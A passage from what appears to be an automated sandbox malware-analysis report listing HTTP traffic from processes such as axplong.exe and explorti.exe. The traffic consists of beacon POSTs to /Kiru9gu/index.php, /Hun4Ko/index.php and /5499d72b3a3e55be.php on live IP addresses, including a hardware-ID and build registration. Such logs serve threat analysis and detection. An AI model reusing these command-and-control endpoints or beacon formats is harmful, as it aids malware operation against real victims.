                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.64984477.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:15.773291111 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:17.393857956 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:17.394748926 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:17.395083904 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:17.395612001 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:17.617607117 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.64984577.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:16.128163099 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:20.641928911 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:20.643821955 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:20.644762993 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.64984677.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:17.749313116 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:19.395343065 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:19.395700932 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:19.396146059 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:19.396444082 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:20.640115976 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0
                                                                                        Jul 24, 2024 07:15:20.642107964 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0
                                                                                        Jul 24, 2024 07:15:20.645495892 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.64984785.28.47.31809252C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:19.414467096 CEST86OUTGET / HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:15:20.643213034 CEST203INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:15:19 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:15:20.644676924 CEST203INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:15:19 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:15:20.645718098 CEST203INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:15:19 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:15:20.648134947 CEST409OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHC
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 211
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 34 32 41 32 42 37 30 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 2d 2d 0d 0a
                                                                                        Data Ascii: ------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="hwid"8A42A2B70D8C1730677652------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="build"sila------GDBKJDGIJECFIEBFIDHC--
                                                                                        Jul 24, 2024 07:15:20.838263988 CEST210INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:15:20 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 8
                                                                                        Keep-Alive: timeout=5, max=99
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                        Data Ascii: YmxvY2s=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.64984977.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:20.651956081 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:21.369837999 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:21 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.64985177.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:20.761583090 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:21.463557959 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:21 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:21.541955948 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:21.885782957 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:21 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.64985277.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:21.557219028 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:22.260332108 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:22.261615992 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:22.486682892 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.64985477.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:21.997543097 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:22.702146053 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:22.711261034 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:22.931056023 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.64985577.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:22.614101887 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:23.311213017 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:23 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:23.315459967 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:23.537585974 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:23 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.64985677.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:23.041835070 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:23.741519928 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:23 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:23.742266893 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:23.965188026 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:23 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
